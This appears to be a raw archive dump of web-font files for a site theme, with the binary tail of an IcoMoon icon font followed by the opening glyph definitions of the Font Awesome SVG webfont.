tZr4*_6V,T'Hf �:X#]A''V0X0U'�,V)Ee!\.d4+X-���&\`TO��4-'�&="���(������%%!%%!�@��@����84��vJ�@@�@Hx��5;��#)/5".#"0:32654&#37'##'7337'#37'#|'?P.+r�r7MM7�  P  �  p  �+J7 �mJ54K����ࣝ�����@@@@���!<!"3!2654&#'73#'73#'73*1.5467>32>32���(88(@(88��  p  p  y^p^$Kn
-@@�8(��(88(@(8�@````��������YeJ?--@���z�"&#*'<7.'623''>54&'.'.'.#"812'623.#"465.'3267"&#*#3267>54&'"&5463232654&/.54>32#"&#"#�����u
�5!!M+-_1.E#9i()+4"!M+-_1* H%9i()+�&�w 7!g58#�]5*CU+(RB+&/$_/2< q]?=\=��
����,1_-+M!"4+)(i9%F 
*1^-+M!"4,()h:$G �d0i0#	&Z/0D+%2W'a3'D1��@0kw���4632#"&%4632#"&6#"&'.7>32674&#".'732654&#"'&.#"32>54&'>2#"&5464632.".54>32.'>32%%%%�%%%% 	

"a//a"

	 H''H}K5$;1wAL�
2(88(-
�g@t0;$5K+!Fz�]]�zF!+���&)�M�e::e�MM�e::e�K)&@%%%%%%%%n
 	  	 
	5K$"�*$8((80
�!$K5'?&BuW22WuB&?k��&+ �`&CX33XC&&CX33XC&y+& ���!#5373� @�I��I������H��9����##"&/#"&'.'.'"&'.546323267>32#7'.'.'"&'.546323267>32#7>54&'"&5467>323267>32#>54&'"&546323267>32�	

�t��




 
�_X


;:
	


	Ni�
		
�
�.���		
	���� 	
wm	 ��j
���3!"3!2654&#3'"&54632#4&#"#3>32���(88(@(88����@%%%%�%%��:"<T�8(��(88(@(8���@%%%%�%%��O4^B@�@'33>32#4&#"#!3##"&54632��YCGV0�GH&������8((88((8@[!:)Hb9��1dY7��@���(88((88��K%'0#"&5463232654&/.546327.#"#"&/.#"3269�&TD=N[5NA%,GjLm�OLK&-'*.uiZO�?IO-#><YV&1DY;AbC""A_>ca�fDbUlXY@u+J8 JXGO	 !"%OFH`<L
%!S@v9O2'LmFCfF#>���U!"3!2654&"&/.#"32610#".54>3232654&/.54632.#"���(88(@(88݆r!9D/OD5<J TW6S9:V9fr "KN46'F@7qEO\g(%!'"BBEv�8(��(88(@(8�iKf9MM_JV<Y7=Z:=`B#Sdf9I 	C4T?=F!E?LA���!!!!��@�����@���@�@@�� 5"#"&=332654632'54&#".=7326=3&qOOq�&&qOOqR.&�qO(F4.R&&��&�OqqO��&&OqmE>>"��Oq6L-||%)&����0E!"3!2654&"#"&=332654632'54&#".=7326=3T�XGeeG�Gee�e&qOOq�&&qOOqR.&�qO(F4.R&&��eG�XGeeG�Ge��&�OqqO��&&OqmE>>"��Oq6L-||%)&����!3!!!77773���@���q��6D6�N�8;@����@�|�}�t��t�f�ID�|^".7>10&5463232654&#"'.54>32#"&'032>54.#\�yF*Kh=
/!
)!;PgR^j*0&JmH9dJ*"=U2"9"
B"\�yFFy�\|Fy�\F�lRI
HL<$/=%O(!/qZPewJ8
$h05aJ-'E]7:dK+ZA

Fx�\\�yF���r"32>54."&'>7>132>54.#"67>76&'.54632#"&7>54&#"10.54>32#j��QQ��jj��QQ��j"B
"9"2U="*Jd9HmJ&0*j^RgP;!)
!/
=hK*Fy�\\�yFFy�\�Q��jj��QQ��jj��Q�D	BZ+Kd:7^D'-Ja41h$
8JwePZq/!(O%=.$;MH
ISk�G\�yFFy�\\�yF���1U!"3!2654&#"&'&4?041'&47>;2031#8+"&'0.5>1>;2���(88(@(88�qouKo
K&,$��o
1;1M[K
p�8(��(88(@(8�f	��	
�CN@�N��	ZlZ���
	O����#F"8;2670>7.1.+%"001;26764'"0764'.#�d�
�0;2& �lczgBNB�
�G
����
UhY7B7
��׸y�x
}B��� @"17467162311312671!1"#15<51.#1"1!2>51p\�].�5IY"����5IY"�cH\�].�4f�b���Qd�����Qd��c4f�b%�]�*.#!"326?32676&#";#"!T	��%
	�"���%%�(�
	��f%�!
	��%%�
	�%b����)?Tj10326170674&1'0&'6170676&1'0&'&10'>10&'&01074&1'0&0617>&1007>170&'a
�g
#�	%�#	t�	j	��2 �$	
	'�@ �	�3$��
NaG
��E+Z-	K

(���m	�"
	8D	�!
6$�\����=+#;26?>;2>76&''.#!";>;2>7>56&'�Il�WM6A�<jT;
	c$}R����1]ExaC	 �OyR*���<aG5Z"�(%��9
EnQ	<V%���%1A'>32!"&#"%!>54&'4632#"&.5467326�#Xfr=F�r]"�^.RC0�&O��i�*%��mMMmmMMm�]�uC" �O#�,H2$B]84H+z+_1i��Rk K*7`$�MmmMMmm��Y��`D8��CT�����0&'.110&'&*#:1810"0&'&'6.'67021>6'.'.'>7>7<56&'.'8181818181>7>7>746381041>78140504104104581<5<5818#041818181.#89&""&'>76"16&".'.'0"1041006706727:3>7>&1�>KSZ@'<OL
&5qhX\#4$C0%

	
		"k!4":
	
	#!T`k8).��?rL�'=(+o-UH.'|%$8�j"R3
3
	$
	




$
!0+/N`E3#[C)f;:W<"&�Ԥ���M9AKT3>54&'6&'."&#">76732>7##"&'.=!%>32!.'>&67��'CWh8		M�qP1kD5Zv:/�a-d6H�mQ�[77[��~kJJk��%%i?Di�� *aAHoK=o1M'2YzH>\!4ZŲ�./-OmA-99-/tIffI]Z;8W�� RIv' 	����3>7!67&'.5&>7!0.#1Gy�mAwgU  �}��>%r��@7\B%"B^:$
k"VUP�rZ!�Y�}L;V9;}Ekcf*,�&	K_m7Gx`KJ:CRC.H[0<���#'+/37;?CGK����������37;?CGKPTX\aejnrv{����������������"32>54.'/////:#62>>>><&4.7'.'7'.535#4677'>77'>77'>77'>77'>77'>77'2633523777.'7'.'.'..*37"???0?7'''''"#5#"&#7'.'7'.'7'.'7%7777#3''7''7''7'7'77'7'7'7'7'''7%'7'7!7'%'77'%'7'7''7''7'7'7'7''7'7j��PP��jj��PP��TF=�V�#=JFP	P#0/``/0#P	P%
%
CD
6
5*`44`+65
���
%
%>�V�#!%
%
CD
6
5*`44`+65
^�
%
%P	P#00``00#P	P_E�@����%%H%%�s���***+�)YY�YY�-.Y..��^^l^^��^^r^^��..^..��YY6Y�7+�*�����%%W%%������P��jj��PP��jj��P�'�#=JF=�V�
6
5*`44`+65
DD
%
%P	P#00``00#P	P%
%
�
?JF
DD
%
%P	P#00``00#P	P%
%
�^
6
5*`44`+65���^^��^^e.-��..KYY��YY"*�*7�LK%%�%%���������%%f%�����*�*�YY<YY��.0-��^^^���!U9.'>54.'>1013267#*'.54>30232.#",?(1]N;0S=""=S0;N]1'@,�W*33+DMV.8h-"NV^1f��LP��j1]VN!-h8.VMD�9kaV#

Bc~GG~cB

#Vak9!2�SS�2#:) 0"T��gj��P"0!):#@����KUbs����.'".'.'>706'4&/.+""3267>73267>7>'4&'>7>72.5063>7>71%#"&'>32.'.'.#!"3!2654&'1'#5#!"&54630:1;J
-#8

/

 ,8M2;�:,d"
��,"	#1

O	*3Y'�0 
Y-3')�!//!�!/�%
�)o	� 		���
�s


I)�
$lF ?3	9	RX

�8	83f*#40�K#7 5
�3-/!��!//!p)'6)�
%��		`	�
@����
%@I_.6>&1&.>76>7>7.#.'.'.#!"3!2654&'1'#5#!"&54630:1;�-k+4j%$j3+i-4a*)XXS"'G�6>$/h4 K%�-3')�!//!�!/�%
�)o	� 		���
��')�!	 &1!3y3-/!��!//!p)'6)�
%��		`	�
@����*3I3##33#%.'.'.#!"3!2654&'1'#5#!"&54630:1;�,3BkM:oqmLDe��-3')�!//!�!/�%
�)o	� 		���
���>��>�/��\�3-/!��!//!p)'6)�
%��		`	�
@����)2H#'#35#7377.'.'.#!"3!2654&'1'#5#!"&54630:1;�``����22o����-3')�!//!�!/�%
�)o	� 		���
�@����\K��3-/!��!//!p)'6)�
%��		`	�
@����*.#!"3!2654&'!!2#"6=4&
 
��



)�@_R �

�

�


�@

@
 
������
�

�
=����%!!!/33?!!=RprR�z�O
���r}~
�x6
��ffg���t��@@�Z""�Vq=����%!'5%!/#7!'!7!=RprR�z����F��
}r���d
�
����ffg���RR�9�""Z�@@[tq�����!!!'7#%�"��D"�'����)�Қ��p��^^UϚ�����D	&">32>32#"&5467'#"&5467.5467'2764'�A6hO	(8�	(88((8�$8((8$$N���6���hN8(	�8((88(	���
2(88(2


2	O��6�A�6���{$),158	&"3267>54&''7'5'#'%5%777��@�@�		��.����f��@��f�������������P+������+*��ooo���o��o�ަZ�����o��o��Z����p"#76764'&"5>54&#"'6&'&"7#.#"32673&27>'732654&'52764'.'332654&#�%��&P�8((8�P&��%(88(%��&P�8((8�P&��%(88( �P&��%(88(%��&P�8((8�P&��%(88(%��&P�8((8��� 54632#"&5"32>54..54>7E11EE11E�j��PP��jj��PP���9_D%%D_9:_D%%D_:�1EE11EE1P��jj��PP��jj��P�A!_s�HH�s_!!_s�HH�s_!�q��_<���������
	���
	����
	�@� `@ �@`@@@� �@@@��@��@ �����`@� `@��`@@-��@
�����@��`
``���� �@�@@@@����C���������������������k��l�U ��:�PS &Z%@���@� �@	�A%��������������@@@@@@@@@@@@  ��@@````@@``ss����������``������������������������������������������������������������������������������������������������������������``````````          @@������������  ������@@����    @@  ��  ��@@@@@@@@``����``������``````@@@@RS��``����������������������@@````��nn��������    ``@@����������������������������������``������``��������``````````````````````````````````````````````````````��``����������    ��('������``@@@@@@@@@@@@@@@@``````````��qq����tt``����```@`@`@`@`@`@``��������������������������������������������������������������������������������������������������������������������������������������������``@`@`@`>����������� @$D @~���������������`���.�M���������������@@>@��``��~~~~@@~~``������������������������@@��@@������������������������������������@@��������������������@@@@����������������������``������������������@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@��@���@�@@@@@@@@@@""@��@ @@���@@@����@��@8 9@@@�� 
OD@@@6@@Y@@@���S~��@�@@@@�������@@   ���@���S@@      ��@.e�@@���PP��@  
F?
	�r�j�@9@@DO�b\@@@@@==(<D���
\�@��D�@ !�"�$%�(,)4*P+<,T-�/P0`2p3�55�7t8�:�=? @0ATCJ(K�L�NHO�Q�SLT�WY�[�]H^�`�a�b�d�fgijXk�mpo�p�r<s�v�w�y�{�|�}�~�������������4���������H������t���������d�p�\� ���8�<�����h����L�8à�����������L��΄����x�|֤��،٬���tݘ�d�@�������\��l������|��������t�����p��D	�L
��4�p�0�`���|��(,����x� <!4!�"H"�"�"�##8#l#�#�$$�%X%�&�'�(D))�**H+D+�,�-|.0.�/p00�101�2`2�3`44�67$8�9�:�;�<�=�>�?�@�A�B�CtD�E�G HDH�I0JJ�KpLL�MPNHOO�P(P�QXR8R�S�T�U�VpWW�X�YpZ|[t[�\D]]�^�_8_�`@`�a@a�bHcctd|eXf<f�hh�i�j�k�k�l�m$m�npoLo�p�q8rTstt�u�vDww�xTx�y�zl{\||�}(~~���8�����������|�(������T�H��|���x�����<� ���p���l���L����d�8���`���h�����x�l����t����t� �����x����x�T������0�4�H�8���\����h��D���<���P��8��H���P��x�8�,�����T�L�������Ì�t�Hƀ�l�t�h�4ʸ˄����t�$΄�(Ϩ��H����Ҽ������֨�D���Tذ�p�ڠ�ی���@܌ݤ�d��p�\�������l��8�\� ����������H� �������H�$������|�H���\�������H�p<��	d
�d ��Tx0������ !4!�"�##�$�%t&4'�)T*4*�+�, -0-�.�/|0|1822�3�4�5t6$8�:�;�<|=�?(@4AA�BC|D�E�F�G�H�J(KlM�OhQ�S�VHXX�Y$Z�\]H^0_�`�cddf\g�i\jdl�n�p�rr�slu8v�xyz�{�}}�� ������P�H�|�\�,�����������t�������T�h����0�����0�������d�����0�p���p�<�|���L����T�������h���DÄ�D�Ő�H��ǔ�XȈȸ��pɴ��Lʜ���<ˌ��� �d̸����ѰҰ�p�d�$������P���ڜ�<��ܜ�X��|�L�P��X��X�$�$��$��h� ����t�0������������X�����(�H��<�x@��H$��`\�	�
T<��

�� �(�<�d���<��dH���l�h\� �!`!�"�#�$�%D&8&�'�(�)|* ++�-(.4/�0�2,384�5�6�7P8h9$:<:�;�<H==�>�?d@@�ADA�BhB�C�DD�E\F0F�G�HH�I`J(J�KxLL�M0M�N`OO�P8P�QpQ�R�S�T�U`V�W�Y$Z\\^\_�`�b4cPdXd�ff�g�h<i�jXk�lxm�n4oTo�qq�r�s�t�uTvlwxx�z�{�}}���D�D�l��4��������h�x�����������(�����������������d���(�4�����l�������������������|�`��D�L����t�����t�\���d���(���@���X���p�����TäİŐ�x�8�������̐�|�<�@����h�$Ҽ�Dՠ�׸���ڴ�H�X�<�4��$����h����H���D����<�0�������8�p�|�x�H�H��p�����8�x������|4�t���(��	�
���
��D���\�X��D�XL���4 p!�"h#$$P%P&(&�'�(H) )�*�+<,,,�.,/<0P1822�3�4�6�89�:�<=(>�?�A(BxC�D�F0GHH�I�KLM<N0P(Q�SpT�VlW�YY�[h\�^_8`�bcDd0e�g4h�i�j�k�l�m�ohp�rDsdt�v8w�x�y�z�|�~|����D�������������$���������������H�x�`�����,�x��T���8����0����4�T�0�h�\���x���T�����0�D�����@����ô��X�\Ȝɘ�����(� τФ�PӸ�<�|׼ظ��X٘�ڜ��Tی�8���h�ޘ�(����������$��p����8�0�� ���P���l����������\��������(�`������D���T�,���l��������xP`�|��4�D�	,	�

�
���
�H���0��d ��H��8x0��8x��`@H��t  � �!�"T#T$x%�(8)*+,,,�-X99�:�;$;�<�==l=�=�>p?8?�@@�AhBDC E E�F@F�GpG�H�H�I�JLK�L0L�M\NN�OO�P�QpRRxS$S�TT�UU�U�V4W,W�W�XHX�YdY�ZDZ�[�\\\\�\�]L]�^`^�_4_�_�`bc0dDd�e�fhghhXi�i�i�k�k�m|m�n4npn�o8o�pp�q�r�slt$t�u�v�w<x<yz�{�|�}d~���<���h��P� �(�����L�d�X� �������0�t��l���X���@�����t������l�0��D���H�����t���� ���@������4�`������0�\�������l���H���(�t����p��������D�l�����(�����`���0���������8���(�����p������P�L���,�����@���<������H��Ę���Lǜ���(Ȝ��4���x���T˨�̼�xͰ�,Έ�ϨЈ��� �t�<ӌ���0�|���4՜��8ֈ�ט�T���l�0ۈ�ܰ�`�ް�p���(�l�����,���<�l����T����4��H�$��,���@���H�0�H��������X���d�p�p		�
�T�
���`����H0<<�PD� �!"#@$,$�%�&$'H((�+,,�2�3p5�6�7�8\8�9H9�::�;�<�=|��<�`6uK
�		g	=	|	 	R	
4�icomoonicomoonVersion 1.0Version 1.0icomoonicomoonicomoonicomoonRegularRegularicomoonicomoonFont generated by IcoMoon.Font generated by IcoMoon.PK!xU��0�0�$bizone/fonts/fontawesome-webfont.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata></metadata>
<defs>
<font id="fontawesomeregular" horiz-adv-x="1536" >
<font-face units-per-em="1792" ascent="1536" descent="-256" />
<missing-glyph horiz-adv-x="448" />
<glyph unicode=" "  horiz-adv-x="448" />
<glyph unicode="&#x09;" horiz-adv-x="448" />
<glyph unicode="&#xa0;" horiz-adv-x="448" />
<glyph unicode="&#xa8;" horiz-adv-x="1792" />
<glyph unicode="&#xa9;" horiz-adv-x="1792" />
<glyph unicode="&#xae;" horiz-adv-x="1792" />
<glyph unicode="&#xb4;" horiz-adv-x="1792" />
<glyph unicode="&#xc6;" horiz-adv-x="1792" />
<glyph unicode="&#xd8;" horiz-adv-x="1792" />
<glyph unicode="&#x2000;" horiz-adv-x="768" />
<glyph unicode="&#x2001;" horiz-adv-x="1537" />
<glyph unicode="&#x2002;" horiz-adv-x="768" />
<glyph unicode="&#x2003;" horiz-adv-x="1537" />
<glyph unicode="&#x2004;" horiz-adv-x="512" />
<glyph unicode="&#x2005;" horiz-adv-x="384" />
<glyph unicode="&#x2006;" horiz-adv-x="256" />
<glyph unicode="&#x2007;" horiz-adv-x="256" />
<glyph unicode="&#x2008;" horiz-adv-x="192" />
<glyph unicode="&#x2009;" horiz-adv-x="307" />
<glyph unicode="&#x200a;" horiz-adv-x="85" />
<glyph unicode="&#x202f;" horiz-adv-x="307" />
<glyph unicode="&#x205f;" horiz-adv-x="384" />
<glyph unicode="&#x2122;" horiz-adv-x="1792" />
<glyph unicode="&#x221e;" horiz-adv-x="1792" />
<glyph unicode="&#x2260;" horiz-adv-x="1792" />
<glyph unicode="&#x25fc;" horiz-adv-x="500" d="M0 0z" />
<glyph unicode="&#xf000;" horiz-adv-x="1792" d="M1699 1350q0 -35 -43 -78l-632 -632v-768h320q26 0 45 -19t19 -45t-19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45t45 19h320v768l-632 632q-43 43 -43 78q0 23 18 36.5t38 17.5t43 4h1408q23 0 43 -4t38 -17.5t18 -36.5z" />
<glyph unicode="&#xf001;" d="M1536 1312v-1120q0 -50 -34 -89t-86 -60.5t-103.5 -32t-96.5 -10.5t-96.5 10.5t-103.5 32t-86 60.5t-34 89t34 89t86 60.5t103.5 32t96.5 10.5q105 0 192 -39v537l-768 -237v-709q0 -50 -34 -89t-86 -60.5t-103.5 -32t-96.5 -10.5t-96.5 10.5t-103.5 32t-86 60.5t-34 89 t34 89t86 60.5t103.5 32t96.5 10.5q105 0 192 -39v967q0 31 19 56.5t49 35.5l832 256q12 4 28 4q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf002;" horiz-adv-x="1664" d="M1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1664 -128q0 -52 -38 -90t-90 -38q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5 t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z" />
<glyph unicode="&#xf003;" horiz-adv-x="1792" d="M1664 32v768q-32 -36 -69 -66q-268 -206 -426 -338q-51 -43 -83 -67t-86.5 -48.5t-102.5 -24.5h-1h-1q-48 0 -102.5 24.5t-86.5 48.5t-83 67q-158 132 -426 338q-37 30 -69 66v-768q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1664 1083v11v13.5t-0.5 13 t-3 12.5t-5.5 9t-9 7.5t-14 2.5h-1472q-13 0 -22.5 -9.5t-9.5 -22.5q0 -168 147 -284q193 -152 401 -317q6 -5 35 -29.5t46 -37.5t44.5 -31.5t50.5 -27.5t43 -9h1h1q20 0 43 9t50.5 27.5t44.5 31.5t46 37.5t35 29.5q208 165 401 317q54 43 100.5 115.5t46.5 131.5z M1792 1120v-1088q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf004;" horiz-adv-x="1792" d="M896 -128q-26 0 -44 18l-624 602q-10 8 -27.5 26t-55.5 65.5t-68 97.5t-53.5 121t-23.5 138q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5q224 0 351 -124t127 -344q0 -221 -229 -450l-623 -600 q-18 -18 -44 -18z" />
<glyph unicode="&#xf005;" horiz-adv-x="1664" d="M1664 889q0 -22 -26 -48l-363 -354l86 -500q1 -7 1 -20q0 -21 -10.5 -35.5t-30.5 -14.5q-19 0 -40 12l-449 236l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41t49 -41l225 -455 l502 -73q56 -9 56 -46z" />
<glyph unicode="&#xf006;" horiz-adv-x="1664" d="M1137 532l306 297l-422 62l-189 382l-189 -382l-422 -62l306 -297l-73 -421l378 199l377 -199zM1664 889q0 -22 -26 -48l-363 -354l86 -500q1 -7 1 -20q0 -50 -41 -50q-19 0 -40 12l-449 236l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500 l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41t49 -41l225 -455l502 -73q56 -9 56 -46z" />
<glyph unicode="&#xf007;" horiz-adv-x="1408" d="M1408 131q0 -120 -73 -189.5t-194 -69.5h-874q-121 0 -194 69.5t-73 189.5q0 53 3.5 103.5t14 109t26.5 108.5t43 97.5t62 81t85.5 53.5t111.5 20q9 0 42 -21.5t74.5 -48t108 -48t133.5 -21.5t133.5 21.5t108 48t74.5 48t42 21.5q61 0 111.5 -20t85.5 -53.5t62 -81 t43 -97.5t26.5 -108.5t14 -109t3.5 -103.5zM1088 1024q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5z" />
<glyph unicode="&#xf008;" horiz-adv-x="1920" d="M384 -64v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM384 320v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM384 704v128q0 26 -19 45t-45 19h-128 q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1408 -64v512q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-512q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM384 1088v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45 t45 -19h128q26 0 45 19t19 45zM1792 -64v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1408 704v512q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-512q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM1792 320v128 q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1792 704v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1792 1088v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19 t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1920 1248v-1344q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1344q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf009;" horiz-adv-x="1664" d="M768 512v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM768 1280v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM1664 512v-384q0 -52 -38 -90t-90 -38 h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM1664 1280v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf00a;" horiz-adv-x="1792" d="M512 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 288v-192q0 -40 -28 -68t-68 -28h-320 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28 h320q40 0 68 -28t28 -68zM1792 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 800v-192 q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf00b;" horiz-adv-x="1792" d="M512 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 288v-192q0 -40 -28 -68t-68 -28h-960 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h960q40 0 68 -28t28 -68zM512 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 800v-192q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v192q0 40 28 68t68 28 h960q40 0 68 -28t28 -68zM1792 1312v-192q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h960q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf00c;" horiz-adv-x="1792" d="M1671 970q0 -40 -28 -68l-724 -724l-136 -136q-28 -28 -68 -28t-68 28l-136 136l-362 362q-28 28 -28 68t28 68l136 136q28 28 68 28t68 -28l294 -295l656 657q28 28 68 28t68 -28l136 -136q28 -28 28 -68z" />
<glyph unicode="&#xf00d;" horiz-adv-x="1408" d="M1298 214q0 -40 -28 -68l-136 -136q-28 -28 -68 -28t-68 28l-294 294l-294 -294q-28 -28 -68 -28t-68 28l-136 136q-28 28 -28 68t28 68l294 294l-294 294q-28 28 -28 68t28 68l136 136q28 28 68 28t68 -28l294 -294l294 294q28 28 68 28t68 -28l136 -136q28 -28 28 -68 t-28 -68l-294 -294l294 -294q28 -28 28 -68z" />
<glyph unicode="&#xf00e;" horiz-adv-x="1664" d="M1024 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-224v-224q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v224h-224q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h224v224q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5v-224h224 q13 0 22.5 -9.5t9.5 -22.5zM1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1664 -128q0 -53 -37.5 -90.5t-90.5 -37.5q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5 t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z" />
<glyph unicode="&#xf010;" horiz-adv-x="1664" d="M1024 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-576q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h576q13 0 22.5 -9.5t9.5 -22.5zM1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5z M1664 -128q0 -53 -37.5 -90.5t-90.5 -37.5q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z " />
<glyph unicode="&#xf011;" d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61t-298 61t-245 164t-164 245t-61 298q0 182 80.5 343t226.5 270q43 32 95.5 25t83.5 -50q32 -42 24.5 -94.5t-49.5 -84.5q-98 -74 -151.5 -181t-53.5 -228q0 -104 40.5 -198.5t109.5 -163.5t163.5 -109.5 t198.5 -40.5t198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5q0 121 -53.5 228t-151.5 181q-42 32 -49.5 84.5t24.5 94.5q31 43 84 50t95 -25q146 -109 226.5 -270t80.5 -343zM896 1408v-640q0 -52 -38 -90t-90 -38t-90 38t-38 90v640q0 52 38 90t90 38t90 -38t38 -90z" />
<glyph unicode="&#xf012;" horiz-adv-x="1792" d="M256 96v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM640 224v-320q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v320q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1024 480v-576q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23 v576q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1408 864v-960q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 1376v-1472q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v1472q0 14 9 23t23 9h192q14 0 23 -9t9 -23z" />
